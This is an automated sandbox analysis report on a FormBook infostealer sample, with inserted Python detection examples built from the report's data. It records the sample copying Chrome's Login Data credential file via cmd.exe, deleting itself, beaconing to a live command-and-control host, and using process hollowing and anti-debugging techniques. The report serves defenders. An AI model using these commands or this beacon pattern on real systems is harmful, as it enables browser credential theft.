
Analysis Report order SEC.exe

Overview

General Information

Sample Name:order SEC.exe
MD5:f319e92f4c7839b55943970fba7b6955
SHA1:7db24dcfff5e1e729c0fe42a8bdef1fc0c9e9e27
SHA256:b34eee81acc147f9414fe2e9b9779853f9139759e516304315a5572f5c57c583

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order SEC.exe (PID: 4848 cmdline: 'C:\Users\user\Desktop\order SEC.exe' MD5: F319E92F4C7839B55943970FBA7B6955)
    • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
      • help.exe (PID: 4896 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\order SEC.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5044 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x19229:$sqlite3step: 68 34 1C 7B E1
  • 0x1933c:$sqlite3step: 68 34 1C 7B E1
  • 0x19258:$sqlite3text: 68 38 2A 90 C5
  • 0x1937d:$sqlite3text: 68 38 2A 90 C5
  • 0x1926b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x19393:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0xa6a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xa912:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x165a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16091:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x166a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1681f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xb48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1530c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xc183:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18439:$sqlite3step: 68 34 1C 7B E1
  • 0x1854c:$sqlite3step: 68 34 1C 7B E1
  • 0x18468:$sqlite3text: 68 38 2A 90 C5
  • 0x1858d:$sqlite3text: 68 38 2A 90 C5
  • 0x1847b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185a3:$sqlite3blob: 68 53 D8 7F 8C
(13 further memory-dump matches are collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author
0.2.order SEC.exe.1150000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.order SEC.exe.1150000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x23029:$sqlite3step: 68 34 1C 7B E1
  • 0x2313c:$sqlite3step: 68 34 1C 7B E1
  • 0x23058:$sqlite3text: 68 38 2A 90 C5
  • 0x2317d:$sqlite3text: 68 38 2A 90 C5
  • 0x2306b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x23193:$sqlite3blob: 68 53 D8 7F 8C
0.2.order SEC.exe.1150000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x144a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14712:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x203a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x1fe91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x204a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x2061f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x1528a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1f10c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x15f83:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x25717:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x2671a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
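The three JPCERT/CC rule strings above are each five bytes beginning with 0x68, the x86 opcode for push imm32, so every hit is the code pushing a 32-bit constant; the string names ($sqlite3step, $sqlite3text, $sqlite3blob) indicate these constants are the hashed names of the sqlite3 routines FormBook resolves at runtime to read browser credential databases. The following Python is an added example, not the report's or JPCERT/CC's code: it locates those strings in a buffer, decodes the immediates, and evaluates an assumed "all three present" condition (the real rule's condition is not reproduced on this page). The buffer is constructed here with the patterns placed at the offsets listed for the first memory dump.

```python
"""Added example: scan a buffer for the three JPCERT/CC 'Formbook' rule
strings listed in the report and decode each hit as x86 'push imm32'.

The byte patterns and offsets are copied from the report; the buffer
itself is constructed filler, and the all-three-present condition is an
assumption (the page does not show the rule's real condition)."""

import struct

# Rule strings copied from the report. 0x68 = 'push imm32'; the next four
# bytes are a little-endian immediate (an API-name hash, per the names).
FORMBOOK_PUSHES = {
    "$sqlite3step": bytes.fromhex("68341c7be1"),
    "$sqlite3text": bytes.fromhex("68382a90c5"),
    "$sqlite3blob": bytes.fromhex("6853d87f8c"),
}


def decode_push_imm32(chunk):
    """Return the 32-bit immediate of a 'push imm32' instruction."""
    if len(chunk) != 5 or chunk[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", chunk[1:])[0]


def find_all(buf, needle):
    """Every offset of needle in buf, overlapping occurrences included."""
    offsets, start = [], 0
    while True:
        i = buf.find(needle, start)
        if i < 0:
            return offsets
        offsets.append(i)
        start = i + 1


def scan(buf):
    """{rule string name: [(offset, decoded immediate), ...]}."""
    return {name: [(off, decode_push_imm32(buf[off:off + 5]))
                   for off in find_all(buf, pat)]
            for name, pat in FORMBOOK_PUSHES.items()}


def yara_condition(hits):
    """Assumed condition: all three strings must be present."""
    return all(hits[name] for name in FORMBOOK_PUSHES)


def build_sample():
    """Constructed buffer: NOP filler with the pushes placed at the offsets
    the report lists for dump 00000000.00000002.936096041.000000000115B000."""
    buf = bytearray(b"\x90" * 0x19400)
    placements = [(0x19229, "$sqlite3step"), (0x1933c, "$sqlite3step"),
                  (0x19258, "$sqlite3text"), (0x1937d, "$sqlite3text"),
                  (0x1926b, "$sqlite3blob"), (0x19393, "$sqlite3blob")]
    for off, name in placements:
        buf[off:off + 5] = FORMBOOK_PUSHES[name]
    return bytes(buf)


if __name__ == "__main__":
    hits = scan(build_sample())
    for name, matches in hits.items():
        for off, imm in matches:
            print(f"{off:#x}: {name} -> push {imm:#010x}")
    print("condition satisfied:", yara_condition(hits))
```

The decoded immediates (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what a memory-forensics triage can pivot on even when the surrounding code is relocated, which is why a rule built on them matches both the unpacked PE and the injected help.exe regions listed in this report.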

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started
Author: Joe Security
Data:
  Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\cmd.exe
  NewProcessName: C:\Windows\SysWOW64\cmd.exe
  OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\SysWOW64\help.exe
  ParentImage: C:\Windows\SysWOW64\help.exe
  ParentProcessId: 4896
  ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  ProcessId: 5044
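The Sigma hit above and the Startup tree describe one chain: a SysWOW64 system binary (help.exe) launched under explorer.exe spawns cmd.exe twice, once to copy Chrome's Login Data database to %TEMP% and once to delete the original sample. The following Python is an added example, not the report's or Joe Security's rule code: it replays that chain as constructed Sysmon-style process-creation events (field names mirror the Sigma log source; values are typed in from the report, the parent of the sample and the benign control event are assumptions) and runs three detections over them. The host list seeded with help.exe is also an assumption taken only from this report.

```python
"""Added example: process-creation detections for the chain the sandbox
recorded (help.exe -> cmd.exe copying Chrome Login Data / deleting the
sample). Events are constructed from the report's Startup tree."""

import re

# Constructed events. PIDs and command lines come from the report; the
# sample's parent (explorer.exe) and the last benign event are assumed.
EVENTS = [
    {"ProcessId": 4848, "ParentProcessId": 2928,
     "Image": r"C:\Users\user\Desktop\order SEC.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"'C:\Users\user\Desktop\order SEC.exe'"},
    {"ProcessId": 4896, "ParentProcessId": 2928,
     "Image": r"C:\Windows\SysWOW64\help.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\SysWOW64\help.exe"},
    {"ProcessId": 1536, "ParentProcessId": 4896,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\help.exe",
     "CommandLine": r"/c del 'C:\Users\user\Desktop\order SEC.exe'"},
    {"ProcessId": 5044, "ParentProcessId": 4896,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\help.exe",
     "CommandLine": r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V"},
    # Benign control (constructed): a user-launched copy of an unrelated file.
    {"ProcessId": 6000, "ParentProcessId": 2928,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"/c copy C:\Users\user\notes.txt D:\backup\ /V"},
]

LOGIN_DATA_RE = re.compile(
    r"""\\Google\\Chrome\\User Data\\[^'"]+\\Login Data""", re.IGNORECASE)
DEL_RE = re.compile(
    r"""/c\s+del\s+['"]?(?P<path>[^'"]+)['"]?""", re.IGNORECASE)

# Assumption: hollowing hosts seen in this report only.
HOLLOW_HOSTS = {"help.exe"}


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_cmd(ev):
    return image_name(ev["Image"]) == "cmd.exe"


def chrome_login_data_copy(ev):
    """The Sigma logic: cmd.exe copying Chrome's Login Data SQLite file."""
    cl = ev["CommandLine"]
    return (is_cmd(ev)
            and re.search(r"\bcopy\b", cl, re.IGNORECASE) is not None
            and LOGIN_DATA_RE.search(cl) is not None)


def deletes_executed_image(ev, events):
    """cmd.exe /c del of a path that was the Image of another process in
    the trace: the self-deletion step ('del order SEC.exe')."""
    if not is_cmd(ev):
        return False
    m = DEL_RE.search(ev["CommandLine"])
    if not m:
        return False
    target = m.group("path").strip().lower()
    return any(e["Image"].lower() == target for e in events if e is not ev)


def shell_from_hollowed_host(ev):
    """cmd.exe whose parent is a SysWOW64 system binary that should never
    spawn a shell (help.exe in this report)."""
    parent = ev["ParentImage"]
    return (is_cmd(ev) and "\\syswow64\\" in parent.lower()
            and image_name(parent) in HOLLOW_HOSTS)


def run(events):
    """Return (rule, pid) pairs for every event that trips a detection."""
    hits = []
    for ev in events:
        if chrome_login_data_copy(ev):
            hits.append(("chrome_login_data_copy", ev["ProcessId"]))
        if deletes_executed_image(ev, events):
            hits.append(("self_delete", ev["ProcessId"]))
        if shell_from_hollowed_host(ev):
            hits.append(("shell_from_hollowed_host", ev["ProcessId"]))
    return hits


if __name__ == "__main__":
    for rule, pid in run(EVENTS):
        print(f"{rule}: pid {pid}")
```

The parent check is the part worth keeping on a real endpoint: the copy of Login Data is what the sandbox's Sigma rule keys on, but a user running a backup script could trip it, whereas cmd.exe parented by help.exe has no legitimate explanation.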

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: order SEC.exe; Virustotal: Detection: 31%
Source: order SEC.exe; Metadefender: Detection: 18%
Source: order SEC.exe; ReversingLabs: Detection: 50%
Yara detected FormBook
Source: Yara match; File source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: order SEC.exe; Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\order SEC.exe; Code function: 4x nop then pop ebx (0_2_011638BD)
Source: C:\Windows\SysWOW64\help.exe; Code function: 4x nop then pop ebx (4_2_00A07ACD)

Source: global traffic; HTTP traffic detected:
  GET /g8u/?al=BtDgLThBuVqSoyh6qwp+STmKpEzhPytcWsiDMbft7E7CgM5vznTAvCjXRzXIZ34LQ1BZ&S4P=bTwh_fzxcT HTTP/1.1
  Host: www.scentsationalsniffers.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View; ASN Name: unknown unknown
Source: unknown; DNS traffic detected: queries for: www.ynnkfs.com
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.887217948.0000000007B92000.00000004.00000001.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: help.exe, 00000004.00000002.1175214039.0000000000DC2000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: help.exe, 00000004.00000002.1175214039.0000000000DC2000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: help.exe, 00000004.00000002.1177727172.0000000003B6F000.00000004.00000001.sdmp; String found in binary or memory: https://www.scentsationalsniffers.com/g8u/?al=BtDgLThBuVqSoyh6qwp
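The only network activity the sandbox actually observed is the GET to www.scentsationalsniffers.com and the DNS query for www.ynnkfs.com; the font-vendor URLs found in explorer.exe memory (fontfabrik.com, carterandcone.com, tiro.com and the rest) are strings from font metadata in explorer's own address space, not hosts the sample contacted. The following Python is an added example, not part of the report: it parses the captured request and checks the traits behind the "HTTP GET or POST without a user agent" signature (no User-Agent, Connection: close, a short directory path, two short query keys carrying one long opaque value, and a body of NUL bytes). The request text is typed in from the report; the benign control request and the threshold of four indicators are assumptions for this example.

```python
"""Added example: pull apart the HTTP request captured in the report and
score the traits that make it look like a beacon rather than browsing.

The FormBook request is typed in from the report (the seven NUL bytes are
the 'Data Raw' recorded after the headers); the control request and the
THRESHOLD value are constructed assumptions."""

import re
from urllib.parse import urlsplit

FORMBOOK_REQUEST = (
    "GET /g8u/?al=BtDgLThBuVqSoyh6qwp+STmKpEzhPytcWsiDMbft7E7CgM5vznTAvCjXRzXIZ34LQ1BZ"
    "&S4P=bTwh_fzxcT HTTP/1.1\r\n"
    "Host: www.scentsationalsniffers.com\r\n"
    "Connection: close\r\n"
    "\r\n" + "\x00" * 7
)

# Constructed benign control: an ordinary browser request.
CONTROL_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

THRESHOLD = 4  # assumption for this example, not a documented rule


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def split_query(query):
    """Raw key/value split that leaves '+' and '%' untouched (parse_qs
    would turn the '+' inside the al= value into a space)."""
    pairs = {}
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs[key] = value
    return pairs


def beacon_indicators(req):
    """Each trait as a named boolean so analysts can see which ones fired."""
    h = req["headers"]
    url = urlsplit(req["target"])
    qs = split_query(url.query)
    longest = max(qs.values(), key=len, default="")
    return {
        "no_user_agent": "user-agent" not in h,
        "connection_close": h.get("connection", "").lower() == "close",
        "short_dir_path": re.fullmatch(r"/[a-z0-9]{2,4}/", url.path) is not None,
        "two_short_keys": len(qs) == 2 and all(len(k) <= 3 for k in qs),
        "long_opaque_value": (len(longest) >= 40 and
                              re.fullmatch(r"[A-Za-z0-9+/_=-]+", longest) is not None),
        "nul_padded_body": bool(req["body"]) and set(req["body"]) == {"\x00"},
    }


def score(raw):
    """(number of indicators that fired, the indicator dict)."""
    ind = beacon_indicators(parse_request(raw))
    return sum(ind.values()), ind


def looks_like_beacon(raw):
    return score(raw)[0] >= THRESHOLD


if __name__ == "__main__":
    for label, raw in (("formbook", FORMBOOK_REQUEST), ("control", CONTROL_REQUEST)):
        n, ind = score(raw)
        fired = [k for k, v in ind.items() if v]
        print(f"{label}: {n}/{len(ind)} indicators {fired}")
```

Keep the raw request bytes rather than a normalised URL when writing the detection: a query-string decoder that treats the "+" in the al= value as a space would break the opaque-value check, and the NUL-padded body only survives if the capture is not trimmed to headers.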

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\help.exe; Dropped file: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogri.ini
Source: C:\Windows\SysWOW64\help.exe; Dropped file: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogrf.ini
Source: C:\Windows\SysWOW64\help.exe; Dropped file: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: order SEC.exe
Source: C:\Users\user\Desktop\order SEC.exe; Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\order SEC.exe; Code functions (native API calls):
  0_2_01175810 NtAllocateVirtualMemory
  0_2_01175760 NtClose
  0_2_01175630 NtCreateFile
  0_2_011756E0 NtReadFile
  0_2_0117580A NtAllocateVirtualMemory
  0_2_0117575C NtClose
  0_2_0117562A NtCreateFile
  0_2_0584A5F0 NtReadVirtualMemory, LdrInitializeThunk
  0_2_0584A540 NtDelayExecution, LdrInitializeThunk
  0_2_0584A560 NtQuerySystemInformation, LdrInitializeThunk
  0_2_0584A480 NtMapViewOfSection, LdrInitializeThunk
  0_2_0584A4A0 NtUnmapViewOfSection, LdrInitializeThunk
  0_2_0584A410 NtQueryInformationToken, LdrInitializeThunk
  0_2_0584A700 NtProtectVirtualMemory, LdrInitializeThunk
  0_2_0584A720 NtResumeThread, LdrInitializeThunk
  0_2_0584A750 NtCreateFile, LdrInitializeThunk
  0_2_0584A6A0 NtCreateSection, LdrInitializeThunk
  0_2_0584A610 NtAdjustPrivilegesToken, LdrInitializeThunk
  0_2_0584A3E0 NtFreeVirtualMemory, LdrInitializeThunk
  0_2_0584A360 NtAllocateVirtualMemory, LdrInitializeThunk
  0_2_0584A2D0 NtClose, LdrInitializeThunk
  0_2_0584A240 NtReadFile, LdrInitializeThunk
  0_2_0584A5A0 NtWriteVirtualMemory
  0_2_0584A520 NtEnumerateKey
  0_2_0584BD40 NtSuspendThread
  0_2_0584ACE0 NtCreateMutant
  0_2_0584B410 NtOpenProcessToken
  0_2_0584A430 NtQueryVirtualMemory
  0_2_0584A460 NtOpenProcess
  0_2_0584A470 NtSetInformationFile
  0_2_0584B470 NtOpenThread
  0_2_0584A780 NtOpenDirectoryObject
  0_2_0584A710 NtQuerySection
  0_2_0584A6D0 NtCreateProcessEx
  0_2_0584A650 NtQueueApcThread
  0_2_0584B0B0 NtGetContextThread
  0_2_0584A800 NtSetValueKey
  0_2_0584A3D0 NtCreateKey
  0_2_0584A310 NtEnumerateValueKey
  0_2_0584A350 NtQueryValueKey
  0_2_0584A370 NtQueryInformationProcess
  0_2_0584A2F0 NtQueryInformationFile
  0_2_0584A220 NtWaitForSingleObject
  0_2_0584BA30 NtSetContextThread
  0_2_0584A260 NtWriteFile
Source: C:\Windows\SysWOW64\help.exe; Code functions (native API calls):
  4_2_0323A310 NtEnumerateValueKey, LdrInitializeThunk
  4_2_0323A360 NtAllocateVirtualMemory, LdrInitializeThunk
  4_2_0323A350 NtQueryValueKey, LdrInitializeThunk
  4_2_0323A3E0 NtFreeVirtualMemory, LdrInitializeThunk
  4_2_0323A3D0 NtCreateKey, LdrInitializeThunk
  4_2_0323A260 NtWriteFile, LdrInitializeThunk
  4_2_0323A240 NtReadFile, LdrInitializeThunk
  4_2_0323A2D0 NtClose, LdrInitializeThunk
  4_2_0323A800 NtSetValueKey, LdrInitializeThunk
  4_2_0323A750 NtCreateFile, LdrInitializeThunk
  4_2_0323A610 NtAdjustPrivilegesToken, LdrInitializeThunk
  4_2_0323A6A0 NtCreateSection, LdrInitializeThunk
  4_2_0323A560 NtQuerySystemInformation, LdrInitializeThunk
  4_2_0323A540 NtDelayExecution, LdrInitializeThunk
  4_2_0323A410 NtQueryInformationToken, LdrInitializeThunk
  4_2_0323A470 NtSetInformationFile, LdrInitializeThunk
  4_2_0323A480 NtMapViewOfSection, LdrInitializeThunk
  4_2_0323ACE0 NtCreateMutant, LdrInitializeThunk
  4_2_0323A370 NtQueryInformationProcess
  4_2_0323A220 NtWaitForSingleObject
  4_2_0323BA30 NtSetContextThread
  4_2_0323A2F0 NtQueryInformationFile
  4_2_0323B0B0 NtGetContextThread
  4_2_0323A720 NtResumeThread
